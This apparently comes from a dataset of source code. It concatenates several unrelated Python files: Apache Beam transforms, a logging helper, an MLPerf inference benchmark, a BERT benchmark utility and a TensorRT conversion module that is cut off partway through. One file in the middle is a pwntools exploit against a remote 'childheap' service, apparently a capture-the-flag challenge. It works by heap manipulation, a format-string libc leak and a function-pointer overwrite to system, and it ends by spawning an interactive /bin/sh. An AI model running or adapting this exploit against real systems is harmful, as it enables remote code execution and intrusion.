pvalueish = tuple(pvalueish)
except TypeError:
raise ValueError(
'Input to Flatten must be an iterable. '
'Got a value of type %s instead.' % type(pvalueish))
return pvalueish, pvalueish
def expand(self, pcolls):
for pcoll in pcolls:
self._check_pcollection(pcoll)
is_bounded = all(pcoll.is_bounded for pcoll in pcolls)
result = pvalue.PCollection(self.pipeline, is_bounded=is_bounded)
result.element_type = typehints.Union[tuple(
pcoll.element_type for pcoll in pcolls)]
return result
def get_windowing(self, inputs):
# type: (typing.Any) -> Windowing
if not inputs:
# TODO(robertwb): Return something compatible with every windowing?
return Windowing(GlobalWindows())
return super(Flatten, self).get_windowing(inputs)
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, None]
return common_urns.primitives.FLATTEN.urn, None
@staticmethod
def from_runner_api_parameter(unused_parameter, unused_context):
return Flatten()
PTransform.register_urn(
common_urns.primitives.FLATTEN.urn, None, Flatten.from_runner_api_parameter)
class Create(PTransform):
"""A transform that creates a PCollection from an iterable."""
def __init__(self, values, reshuffle=True):
"""Initializes a Create transform.
Args:
values: An object of values for the PCollection
"""
super(Create, self).__init__()
if isinstance(values, (unicode, str, bytes)):
raise TypeError(
'PTransform Create: Refusing to treat string as '
'an iterable. (string=%r)' % values)
elif isinstance(values, dict):
values = values.items()
self.values = tuple(values)
self.reshuffle = reshuffle
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, bytes]
# Required as this is identified by type in PTransformOverrides.
# TODO(BEAM-3812): Use an actual URN here.
return self.to_runner_api_pickled(context)
def infer_output_type(self, unused_input_type):
if not self.values:
return typehints.Any
return typehints.Union[[
trivial_inference.instance_to_type(v) for v in self.values
]]
def get_output_type(self):
return (
self.get_type_hints().simple_output_type(self.label) or
self.infer_output_type(None))
def expand(self, pbegin):
assert isinstance(pbegin, pvalue.PBegin)
coder = typecoders.registry.get_coder(self.get_output_type())
serialized_values = [coder.encode(v) for v in self.values]
reshuffle = self.reshuffle
# Avoid the "redistributing" reshuffle for 0 and 1 element Creates.
# These special cases are often used in building up more complex
# transforms (e.g. Write).
class MaybeReshuffle(PTransform):
def expand(self, pcoll):
if len(serialized_values) > 1 and reshuffle:
from apache_beam.transforms.util import Reshuffle
return pcoll | Reshuffle()
else:
return pcoll
return (
pbegin
| Impulse()
| FlatMap(lambda _: serialized_values).with_output_types(bytes)
| MaybeReshuffle().with_output_types(bytes)
| Map(coder.decode).with_output_types(self.get_output_type()))
def as_read(self):
from apache_beam.io import iobase
coder = typecoders.registry.get_coder(self.get_output_type())
source = self._create_source_from_iterable(self.values, coder)
return iobase.Read(source).with_output_types(self.get_output_type())
def get_windowing(self, unused_inputs):
# type: (typing.Any) -> Windowing
return Windowing(GlobalWindows())
@staticmethod
def _create_source_from_iterable(values, coder):
return Create._create_source(list(map(coder.encode, values)), coder)
@staticmethod
def _create_source(serialized_values, coder):
# type: (typing.Any, typing.Any) -> create_source._CreateSource
from apache_beam.transforms.create_source import _CreateSource
return _CreateSource(serialized_values, coder)
@typehints.with_output_types(bytes)
class Impulse(PTransform):
"""Impulse primitive."""
def expand(self, pbegin):
if not isinstance(pbegin, pvalue.PBegin):
raise TypeError(
'Input to Impulse transform must be a PBegin but found %s' % pbegin)
return pvalue.PCollection(pbegin.pipeline)
def get_windowing(self, inputs):
# type: (typing.Any) -> Windowing
return Windowing(GlobalWindows())
def infer_output_type(self, unused_input_type):
return bytes
def to_runner_api_parameter(self, unused_context):
# type: (PipelineContext) -> typing.Tuple[str, None]
return common_urns.primitives.IMPULSE.urn, None
@staticmethod
@PTransform.register_urn(common_urns.primitives.IMPULSE.urn, None)
def from_runner_api_parameter(unused_parameter, unused_context):
return Impulse()
|
py | b415a3b57103de0322bd86433929f7dce1d6b5e0 | import logging
from typing import Any
from cached_property import cached_property
DEBUG2_LEVEL_NUM = 8
class ExtendedDebugLogger(logging.Logger):
@cached_property
def show_debug2(self) -> bool:
return self.isEnabledFor(DEBUG2_LEVEL_NUM)
def debug2(self, message: str, *args: Any, **kwargs: Any) -> None:
if self.show_debug2:
self.log(DEBUG2_LEVEL_NUM, message, *args, **kwargs)
def setup_extended_logging() -> None:
logging.setLoggerClass(ExtendedDebugLogger)
logging.addLevelName(DEBUG2_LEVEL_NUM, 'DEBUG2')
setattr(logging, 'DEBUG2', DEBUG2_LEVEL_NUM) # typing: ignore
|
py | b415a48136919725f74074a98b04678cc7d61720 | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import json
import logging
import os
import time
import sys
import tqdm
import numpy as np
import dataset
import imagenet
import coco
from more_itertools import chunked
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet": (
imagenet.Imagenet,
dataset.pre_process_vgg,
dataset.PostProcessCommon(offset=0),
{"image_size": [224, 224, 3]},
),
"imagenet_mobilenet": (
imagenet.Imagenet,
dataset.pre_process_mobilenet,
dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]},
),
"imagenet_pytorch": (
imagenet.Imagenet,
dataset.pre_process_imagenet_pytorch,
dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]},
),
"coco-300": (
coco.Coco,
dataset.pre_process_coco_mobilenet,
coco.PostProcessCoco(),
{"image_size": [300, 300, 3]},
),
"coco-300-pt": (
coco.Coco,
dataset.pre_process_coco_pt_mobilenet,
coco.PostProcessCocoPt(False, 0.3),
{"image_size": [300, 300, 3]},
),
"coco-1200": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]},
),
"coco-1200-onnx": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoPt(True, 0.05),
{"image_size": [1200, 1200, 3], "use_label_map": True},
),
"coco-1200-pt": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoPt(True, 0.05),
{"image_size": [1200, 1200, 3], "use_label_map": True},
),
"coco-1200-tf": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3], "use_label_map": False},
),
#
# furiosa golden pre/post-process
#
"imagenet-golden": (
imagenet.Imagenet,
dataset.pre_process_vgg,
dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]},
),
"coco-300-golden": (
coco.Coco,
dataset.pre_process_coco_pt_mobilenet,
coco.PostProcessCocoSSDMobileNetORT(False, 0.3),
{"image_size": [300, 300, 3]},
),
"coco-1200-golden": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoONNXNP(),
{"image_size": [1200, 1200, 3], "use_label_map": False},
),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
#
# furiosa golden model setting
#
"ssd-resnet-golden": {
"dataset": "imagenet-golden",
"backend": "onnxruntime",
"model-name": "resnet50",
},
"ssd-mobilenet-golden": {
"dataset": "coco-300-golden",
"backend": "onnxruntime",
"data-format": "NCHW",
"model-name": "ssd-mobilenet",
},
"ssd-resnet34-golden": {
"dataset": "coco-1200-golden",
"backend": "onnxruntime",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
#
# furiosa npu runtime backend setting
#
"resnet-golden-npu-legacy": {
"inputs": "input_tensor:0",
"outputs": "resnet_model/Squeeze:0_fused_dequantized",
"dataset": "imagenet-golden",
"backend": "npuruntime",
"model-name": "resnet50",
},
"ssd-mobilenet-golden-npu-legacy": {
"inputs": "image",
"outputs": "class_logit_0_dequantized,class_logit_1_dequantized,class_logit_2_dequantized,"
"class_logit_3_dequantized,class_logit_4_dequantized,class_logit_5_dequantized,"
"box_regression_0_dequantized,box_regression_1_dequantized,box_regression_2_dequantized,"
"box_regression_3_dequantized,box_regression_4_dequantized,box_regression_5_dequantized,",
"dataset": "coco-300-golden",
"backend": "npuruntime",
"data-format": "NCHW",
"model-name": "ssd-mobilenet",
},
"ssd-resnet34-golden-npu-legacy": {
"inputs": "image:0",
"outputs": "ssd1200/multibox_head/cls_0/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_1/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_2/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_3/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_4/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_5/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_0/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_1/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_2/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_3/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_4/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_5/BiasAdd:0_dequantized",
"dataset": "coco-1200-golden",
"backend": "npuruntime",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument(
"-b", "--max-batchsize", default=1, type=int, help="max batch size in a single inference"
)
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="eval_result", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument(
"--cache_dir", type=str, default=None, help="path to save preprocessed dataset"
)
parser.add_argument(
"--accuracy", default=True, action="store_true", help="enable accuracy pass"
)
parser.add_argument(
"--find-peak-performance", action="store_true", help="enable finding peak performance pass"
)
parser.add_argument("--debug", action="store_true", help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument(
"--user_conf",
default="user.conf",
help="user config for user LoadGen settings such as target QPS",
)
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("-n", "--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument(
"--samples-per-query", type=int, help="mlperf multi-stream sample per query"
)
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
elif backend == "npuruntime":
from backend_npuruntime import BackendNPURuntime
backend = BackendNPURuntime()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(
results, qitem.content_id, qitem.label, self.result_dict
)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
sys.exit(1)
def enqueue(self, query_samples, pbar):
query_id = idx = list(query_samples.keys())
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
pbar.update(len(query_samples))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i : i + bs])
self.run_one_item(Item(query_id[i : i + bs], idx[i : i + bs], data, label))
pbar.update(bs)
def finish(self):
pass
def add_results(final_results, name, count, result_dict, result_list, took, show_accuracy=False):
percentiles = [50.0, 80.0, 90.0, 95.0, 99.0, 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": count,
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100.0 * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100.0 * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print(
"{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str, len(result_list), buckets_str
)
)
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(
data_path=os.path.abspath(args.dataset_path),
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
cache_dir=args.cache_dir,
count=count,
**kwargs,
)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = "model evaluation"
log.info("starting {}".format(scenario))
runner = RunnerBase(
model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize
)
result_dict = {"good": 0, "total": 0}
runner.start_run(result_dict, args.accuracy)
with tqdm.tqdm(total=count, unit="image") as pbar:
for chunk in chunked(range(count), 1000):
ds.load_query_samples(chunk)
runner.enqueue(ds.image_list_inmemory, pbar)
ds.unload_query_samples(None)
last_timeing = runner.result_timing
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(
final_results,
scenario,
count,
result_dict,
last_timeing,
time.time() - ds.last_loaded,
args.accuracy,
)
runner.finish()
#
# write final results
#
file_name = os.path.basename(args.model).split(".onnx")[0]
if args.output:
with open(f"{file_name}_n={count}.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
py | b415a4c285235b03b60258d29f8b98205c14d526 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions or classes shared between BERT benchmarks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
# pylint: disable=g-bad-import-order
import numpy as np
from absl import flags
import tensorflow.compat.v2 as tf
# pylint: enable=g-bad-import-order
from official.utils.flags import core as flags_core
from official.utils.testing.perfzero_benchmark import PerfZeroBenchmark
FLAGS = flags.FLAGS
class BenchmarkTimerCallback(tf.keras.callbacks.Callback):
"""Callback that records time it takes to run each batch."""
def __init__(self, num_batches_to_skip=10):
super(BenchmarkTimerCallback, self).__init__()
self.batch_start_times = {}
self.batch_stop_times = {}
def on_batch_begin(self, batch, logs=None):
self.batch_start_times[batch] = time.time()
def on_batch_end(self, batch, logs=None):
self.batch_stop_times[batch] = time.time()
def get_examples_per_sec(self, batch_size, num_batches_to_skip=1):
batch_durations = []
for batch in self.batch_start_times:
if batch in self.batch_stop_times and batch >= num_batches_to_skip:
batch_durations.append(self.batch_stop_times[batch] -
self.batch_start_times[batch])
return batch_size / np.mean(batch_durations)
def get_startup_time(self, program_start_time):
return self.batch_start_times[0] - program_start_time
class BertBenchmarkBase(PerfZeroBenchmark):
"""Base class to hold methods common to test classes."""
local_flags = None
def __init__(self, output_dir=None):
super(BertBenchmarkBase, self).__init__(output_dir=output_dir)
self.num_gpus = 8
self.timer_callback = None
def _setup(self):
"""Sets up and resets flags before each test."""
super(BertBenchmarkBase, self)._setup()
self.timer_callback = BenchmarkTimerCallback()
def _report_benchmark(self, stats, wall_time_sec, min_accuracy, max_accuracy):
"""Report benchmark results by writing to local protobuf file.
Args:
stats: dict returned from BERT models with known entries.
wall_time_sec: the during of the benchmark execution in seconds
min_accuracy: Minimum classification accuracy constraint to verify
correctness of the model.
max_accuracy: Maximum classification accuracy constraint to verify
correctness of the model.
"""
metrics = [{
'name': 'training_loss',
'value': stats['train_loss'],
}]
if self.timer_callback:
metrics.append({
'name':
'exp_per_second',
'value':
self.timer_callback.get_examples_per_sec(FLAGS.train_batch_size *
FLAGS.steps_per_loop)
})
else:
metrics.append({
'name': 'exp_per_second',
'value': 0.0,
})
if self.timer_callback and 'start_time_sec' in stats:
metrics.append({
'name': 'startup_time',
'value': self.timer_callback.get_startup_time(stats['start_time_sec'])
})
if 'eval_metrics' in stats:
metrics.append({
'name': 'eval_accuracy',
'value': stats['eval_metrics'],
'min_value': min_accuracy,
'max_value': max_accuracy,
})
flags_str = flags_core.get_nondefault_flags_as_str()
self.report_benchmark(
iters=stats['total_training_steps'],
wall_time=wall_time_sec,
metrics=metrics,
extras={'flags': flags_str})
|
py | b415a8dfbe481fad977efabe5588a995cdc725d7 | from pwn import *
r = remote("13.124.131.103", 31337)
#r = process("./childheap")
def allocate(size, data):
r.send("1\n")
print r.recvuntil("Input size: ")
r.send(str(size)+"\n")
print r.recvuntil("Input data: ")
r.send(data)
print r.recvuntil("> ")
def free():
r.send("2\n")
print r.recvuntil("> ")
def secret(code):
r.send(str(0x31337) + "\n")
print r.recvuntil("code: ")
r.send(str(code) + "\n")
print r.recvuntil("> ")
raw_input("$")
print r.recvuntil("> ")
r.send("1234\n")
allocate(4095, "asdf")
free()
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("new name: ")
r.send("asdf\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
free()
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
r.send("a"*8 + p64(0x6020b0) + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
allocate(4095, "asdf")
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
r.send("\x00"*8 + p64(0x6020a8)*2 + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
free()
secret(1041)
allocate(1023, "\x00"*8 + p64(0x602060-2))
r.send("3\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
payload = p64(0x4007c6)
payload += p64(0x400756)
payload += p64(0x4007e6)
r.send(payload + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
r.send("%7$s.aaa" + p64(0x602038))
recved = r.recv(6)
read_libc = u64(recved + "\x00\x00")
#libc_base = read_libc - 0xf7220
#system = libc_base + 0x45390
libc_base = read_libc - 0xf69a0
system = libc_base + 0x45380
print "read_libc: " +hex(read_libc)
r.send("aa\n") # modify
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
print r.recvuntil("new one (y/n)? ")
r.send("n\n")
print r.recvuntil("> ")
r.send("aa\n")
print r.recvuntil("(y/n)? ")
r.send("n\n")
print r.recvuntil("name: ")
payload = "A"*2
payload += p64(0x4007c6)
payload += p64(system)
payload += p64(0x4007e6)
r.send(payload + "\n")
print r.recvuntil("new one (y/n)? ")
r.send("y\n")
print r.recvuntil("> ")
r.send("/bin/sh\x00\n")
r.interactive()
|
py | b415abcd7bf79040053903b99af3e078ed2cb586 | # Copyright (c) OpenMMLab. All rights reserved.
import warnings
from typing import Union
import onnx
import tensorrt as trt
import torch
from .preprocess import preprocess_onnx
def onnx2trt(onnx_model: Union[str, onnx.ModelProto],
opt_shape_dict: dict,
log_level: trt.ILogger.Severity = trt.Logger.ERROR,
fp16_mode: bool = False,
max_workspace_size: int = 0,
device_id: int = 0) -> trt.ICudaEngine:
"""Convert onnx model to tensorrt engine.
Arguments:
onnx_model (str or onnx.ModelProto): the onnx model to convert from
opt_shape_dict (dict): the min/opt/max shape of each input
log_level (TensorRT log level): the log level of TensorRT
fp16_mode (bool): enable fp16 mode
max_workspace_size (int): set max workspace size of TensorRT engine.
some tactic and layers need large workspace.
device_id (int): choice the device to create engine.
Returns:
tensorrt.ICudaEngine: the TensorRT engine created from onnx_model
Example:
>>> engine = onnx2trt(
>>> "onnx_model.onnx",
>>> {'input': [[1, 3, 160, 160],
>>> [1, 3, 320, 320],
>>> [1, 3, 640, 640]]},
>>> log_level=trt.Logger.WARNING,
>>> fp16_mode=True,
>>> max_workspace_size=1 << 30,
>>> device_id=0)
>>> })
"""
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This function will be deprecated in future. '
msg += blue_text + 'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
device = torch.device(f'cuda:{device_id}')
# create builder and network
logger = trt.Logger(log_level)
builder = trt.Builder(logger)
EXPLICIT_BATCH = 1 << (int)(
trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
network = builder.create_network(EXPLICIT_BATCH)
# parse onnx
parser = trt.OnnxParser(network, logger)
if isinstance(onnx_model, str):
onnx_model = onnx.load(onnx_model)
onnx_model = preprocess_onnx(onnx_model)
if not parser.parse(onnx_model.SerializeToString()):
error_msgs = ''
for error in range(parser.num_errors):
error_msgs += f'{parser.get_error(error)}\n'
raise RuntimeError(f'parse onnx failed:\n{error_msgs}')
# config builder
builder.max_workspace_size = max_workspace_size
config = builder.create_builder_config()
config.max_workspace_size = max_workspace_size
profile = builder.create_optimization_profile()
for input_name, param in opt_shape_dict.items():
min_shape = tuple(param[0][:])
opt_shape = tuple(param[1][:])
max_shape = tuple(param[2][:])
profile.set_shape(input_name, min_shape, opt_shape, max_shape)
config.add_optimization_profile(profile)
if fp16_mode:
builder.fp16_mode = fp16_mode
config.set_flag(trt.BuilderFlag.FP16)
# create engine
with torch.cuda.device(device):
engine = builder.build_engine(network, config)
return engine
def save_trt_engine(engine: trt.ICudaEngine, path: str) -> None:
"""Serialize TensorRT engine to disk.
Arguments:
engine (tensorrt.ICudaEngine): TensorRT engine to serialize
path (str): disk path to write the engine
"""
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This function will be deprecated in future. '
msg += blue_text + 'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
with open(path, mode='wb') as f:
f.write(bytearray(engine.serialize()))
def load_trt_engine(path: str) -> trt.ICudaEngine:
"""Deserialize TensorRT engine from disk.
Arguments:
path (str): disk path to read the engine
Returns:
tensorrt.ICudaEngine: the TensorRT engine loaded from disk
"""
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This function will be deprecated in future. '
msg += blue_text + 'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
with trt.Logger() as logger, trt.Runtime(logger) as runtime:
with open(path, mode='rb') as f:
engine_bytes = f.read()
engine = runtime.deserialize_cuda_engine(engine_bytes)
return engine
def torch_dtype_from_trt(dtype: trt.DataType) -> Union[torch.dtype, TypeError]:
"""Convert pytorch dtype to TensorRT dtype."""
if dtype == trt.bool:
return torch.bool
elif dtype == trt.int8:
return torch.int8
elif dtype == trt.int32:
return torch.int32
elif dtype == trt.float16:
return torch.float16
elif dtype == trt.float32:
return torch.float32
else:
raise TypeError('%s is not supported by torch' % dtype)
def torch_device_from_trt(
device: trt.TensorLocation) -> Union[torch.device, TypeError]:
"""Convert pytorch device to TensorRT device."""
if device == trt.TensorLocation.DEVICE:
return torch.device('cuda')
elif device == trt.TensorLocation.HOST:
return torch.device('cpu')
else:
return TypeError('%s is not supported by torch' % device)
class TRTWrapper(torch.nn.Module):
"""TensorRT engine Wrapper.
Arguments:
engine (tensorrt.ICudaEngine): TensorRT engine to wrap
input_names (list[str]): names of each inputs
output_names (list[str]): names of each outputs
Note:
If the engine is converted from onnx model. The input_names and
output_names should be the same as onnx model.
"""
def __init__(self, engine, input_names=None, output_names=None):
# Following strings of text style are from colorama package
bright_style, reset_style = '\x1b[1m', '\x1b[0m'
red_text, blue_text = '\x1b[31m', '\x1b[34m'
white_background = '\x1b[107m'
